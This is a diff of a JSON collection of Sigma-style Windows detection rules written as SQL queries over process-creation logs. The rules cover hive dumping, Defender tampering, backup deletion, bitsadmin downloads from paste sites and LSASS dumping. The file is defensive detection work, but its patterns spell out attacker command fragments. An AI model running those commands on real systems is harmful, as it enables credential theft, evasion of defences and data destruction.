ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_susp_double_extension_parent.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Potential Privilege Escalation To LOCAL SYSTEM", + "id": "207b0396-3689-42d9-8399-4222658efc99", + "status": "experimental", + "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less 
embarrassing" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE 
'%accepteula%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Renamed Jusched.EXE Execution", + "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", + "author": "Markus Neis, Swisscom", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.execution", + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_renamed_jusched.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", - "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "title": "SystemStateBackup Deleted Using Wbadmin.EXE", + "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "status": "test", + "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have 
Windows Backup enabled.\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "HackTool - Stracciatella Execution", + "id": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - 
"attack.impact", - "attack.t1486" + "attack.execution", + "attack.defense_evasion", + "attack.t1059", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Stracciatella.exe' ESCAPE '\\' OR OriginalFileName = 'Stracciatella.exe' OR Description = 'Stracciatella' OR (Hashes LIKE '%SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a%' ESCAPE '\\') OR sha256 IN ('9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956', 'fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a')))" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_hktl_stracciatella_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", + "title": "PUA - Wsudo Suspicious Execution", + "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as 
seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_dns_susp_child_process.yml" + "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" }, { - "title": "Potential BlackByte Ransomware Activity", - "id": "999e8307-a775-4d5f-addc-4855632335be", + "title": "Dumping of Sensitive Hives Via Reg.EXE", + "id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "status": "test", - "description": "Detects command line patterns used by BlackByte ransomware in different operations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives, which includes SAM, SYSTEM and SECURITY", + "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", + "tags": [ + "attack.credential_access", + 
"attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "car.2013-07-001" + ], "falsepositives": [ - "Unknown" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%save%' ESCAPE '\\' OR CommandLine LIKE '%export%' ESCAPE '\\' OR CommandLine LIKE '%ˢave%' ESCAPE '\\' OR CommandLine LIKE '%eˣport%' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hk˪m%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪ocal\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_loca˪\\_machine%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_˪oca˪\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢystem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\syˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢyˢtem%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ˢecurity%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" + "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml" }, { - "title": "Suspicious HWP Sub Processes", - 
"id": "023394c4-29d5-46ab-92b8-6a534c6f447b", - "status": "test", - "description": "Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation", + "title": "Suspicious Obfuscated PowerShell Code", + "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "status": "experimental", + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001", - "attack.execution", - "attack.t1203", - "attack.t1059.003", - "attack.g0032" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Hwp.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\gbb.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' 
ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hwp_exploits.yml" + "filename": "proc_creation_win_powershell_encoded_obfusc.yml" }, { - "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", - "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", - "status": "test", - "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "Wab Execution From Non Default Location", + "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "status": "experimental", + "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE 
'%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.execution" ], - "filename": "proc_creation_win_schtasks_reg_loader.yml" - }, - { - "title": "HackTool - PCHunter Execution", - "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "status": "experimental", - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" + "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_pchunter.yml" + "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" }, { - "title": "Taskkill Symantec Endpoint Protection", - "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", + "id": "452bce90-6fb0-43cc-97a5-affc283139b3", "status": "experimental", - "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", - "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate use by administrators to test software (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID 
= '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_taskkill_sep.yml" + "filename": "proc_creation_win_reg_defender_tampering.yml" }, { - "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", - "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Time Travel Debugging Utility Usage", + "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "status": "test", + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" ], "falsepositives": [ - "Some legitimate apps use this, but limited." 
+ "Legitimate usage by software developers/testers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": 
"test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine 
